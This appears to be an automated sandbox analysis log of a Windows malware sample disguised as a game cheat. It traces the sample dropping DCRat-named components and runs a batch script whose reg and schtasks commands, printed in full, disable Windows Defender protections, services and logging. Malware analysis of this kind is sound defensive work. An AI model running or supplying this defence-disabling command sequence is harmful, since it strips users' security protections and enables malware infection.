                        Source: C:\Users\user\Desktop\FixTsDfhiC.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\Users\user\Desktop\FixTsDfhiC.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\Users\user\Desktop\FixTsDfhiC.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\Users\user\Desktop\FixTsDfhiC.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\Users\user\Desktop\FixTsDfhiC.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\Users\user\Desktop\FixTsDfhiC.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\Users\user\Desktop\FixTsDfhiC.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\Users\user\Desktop\FixTsDfhiC.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\Users\user\Desktop\FixTsDfhiC.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\Users\user\Desktop\FixTsDfhiC.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\Users\user\Desktop\FixTsDfhiC.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\Users\user\Desktop\FixTsDfhiC.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\Users\user\Desktop\FixTsDfhiC.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\Users\user\Desktop\FixTsDfhiC.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\Users\user\Desktop\FixTsDfhiC.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\Users\user\Desktop\FixTsDfhiC.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\Users\user\Desktop\FixTsDfhiC.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\Users\user\Desktop\FixTsDfhiC.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\Users\user\Desktop\FixTsDfhiC.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\Users\user\Desktop\FixTsDfhiC.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\Users\user\Desktop\FixTsDfhiC.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\Users\user\Desktop\FixTsDfhiC.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\Users\user\Desktop\FixTsDfhiC.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\Users\user\Desktop\FixTsDfhiC.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\Users\user\Desktop\FixTsDfhiC.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\Users\user\Desktop\FixTsDfhiC.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\Users\user\Desktop\FixTsDfhiC.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\Users\user\Desktop\FixTsDfhiC.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\Users\user\Desktop\FixTsDfhiC.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\Users\user\Desktop\FixTsDfhiC.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\Users\user\Desktop\FixTsDfhiC.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\Users\user\Desktop\FixTsDfhiC.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\Users\user\Desktop\FixTsDfhiC.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\Users\user\Desktop\FixTsDfhiC.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\Users\user\Desktop\FixTsDfhiC.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\blockweb\portrefNet.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\blockweb\portrefNet.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\blockweb\portrefNet.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\blockweb\portrefNet.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\blockweb\portrefNet.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\blockweb\portrefNet.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\blockweb\portrefNet.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\blockweb\portrefNet.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\blockweb\portrefNet.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\blockweb\portrefNet.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\blockweb\portrefNet.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\blockweb\portrefNet.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\blockweb\portrefNet.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\blockweb\portrefNet.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\blockweb\portrefNet.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\blockweb\portrefNet.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\blockweb\portrefNet.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\blockweb\portrefNet.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\blockweb\portrefNet.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\blockweb\portrefNet.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\blockweb\portrefNet.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\blockweb\portrefNet.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\blockweb\portrefNet.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\blockweb\portrefNet.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\blockweb\portrefNet.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\blockweb\portrefNet.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\blockweb\portrefNet.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\blockweb\portrefNet.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\blockweb\portrefNet.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\blockweb\portrefNet.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\blockweb\portrefNet.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\blockweb\portrefNet.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\blockweb\portrefNet.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\blockweb\portrefNet.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\blockweb\portrefNet.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\blockweb\portrefNet.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\blockweb\portrefNet.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\blockweb\portrefNet.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\blockweb\portrefNet.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\blockweb\portrefNet.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\blockweb\portrefNet.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\blockweb\portrefNet.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\blockweb\portrefNet.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\blockweb\portrefNet.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\blockweb\portrefNet.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\blockweb\portrefNet.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\blockweb\portrefNet.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\blockweb\portrefNet.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\blockweb\portrefNet.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\blockweb\portrefNet.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\blockweb\portrefNet.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\blockweb\portrefNet.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\blockweb\portrefNet.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\blockweb\portrefNet.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\Users\user\Desktop\FixTsDfhiC.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                        Source: C:\Users\user\Desktop\FixTsDfhiC.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                        Source: FixTsDfhiC.exeReversingLabs: Detection: 92%
                        Source: unknownProcess created: C:\Users\user\Desktop\FixTsDfhiC.exe "C:\Users\user\Desktop\FixTsDfhiC.exe"
                        Source: C:\Users\user\Desktop\FixTsDfhiC.exeProcess created: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe "C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe"
                        Source: C:\Users\user\Desktop\FixTsDfhiC.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\windows defender.bat" "
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
                        Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exeProcess created: C:\Users\user\AppData\Local\Temp\Lunch LaCheat.exe "C:\Users\user\AppData\Local\Temp\Lunch LaCheat.exe"
                        Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheat.exeProcess created: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe "C:\Users\user\AppData\Local\Temp\DCRatBuild.exe"
                        Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheat.exeProcess created: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe "C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe"
                        Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\blockweb\J6PsSzBYKK7mXTJyYh2Tgne.vbe"
                        Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\blockweb\file.vbs"
                        Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic.exe" csproduct get uuid
                        Source: C:\Windows\System32\wbem\WMIC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\blockweb\TOdra8QNG4wQEWkSimCHh9eVG.bat" "
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\blockweb\portrefNet.exe "C:\blockweb\portrefNet.exe"
                        Source: C:\Users\user\Desktop\FixTsDfhiC.exeProcess created: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe "C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe" Jump to behavior
                        Source: C:\Users\user\Desktop\FixTsDfhiC.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\windows defender.bat" "Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exeProcess created: C:\Users\user\AppData\Local\Temp\Lunch LaCheat.exe "C:\Users\user\AppData\Local\Temp\Lunch LaCheat.exe" Jump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /fJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /fJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /fJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /fJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /fJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /fJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /fJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /fJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /fJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /fJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /fJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /fJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /fJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /fJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /fJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /DisableJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /DisableJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /DisableJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /DisableJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /DisableJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /fJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /fJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /fJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /fJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /fJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /fJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /fJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /fJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /fJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /fJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheat.exeProcess created: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe "C:\Users\user\AppData\Local\Temp\DCRatBuild.exe" Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheat.exeProcess created: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe "C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe" Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\blockweb\J6PsSzBYKK7mXTJyYh2Tgne.vbe" Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\blockweb\file.vbs" Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic.exe" csproduct get uuidJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\blockweb\TOdra8QNG4wQEWkSimCHh9eVG.bat" "Jump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\blockweb\portrefNet.exe "C:\blockweb\portrefNet.exe"
                        Source: C:\blockweb\portrefNet.exeProcess created: unknown unknown
                        Source: C:\Users\user\Desktop\FixTsDfhiC.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\Desktop\FixTsDfhiC.exeSection loaded: shfolder.dllJump to behavior
                        Source: C:\Users\user\Desktop\FixTsDfhiC.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\Desktop\FixTsDfhiC.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\Desktop\FixTsDfhiC.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\Desktop\FixTsDfhiC.exeSection loaded: uxtheme.dllJump to behavior
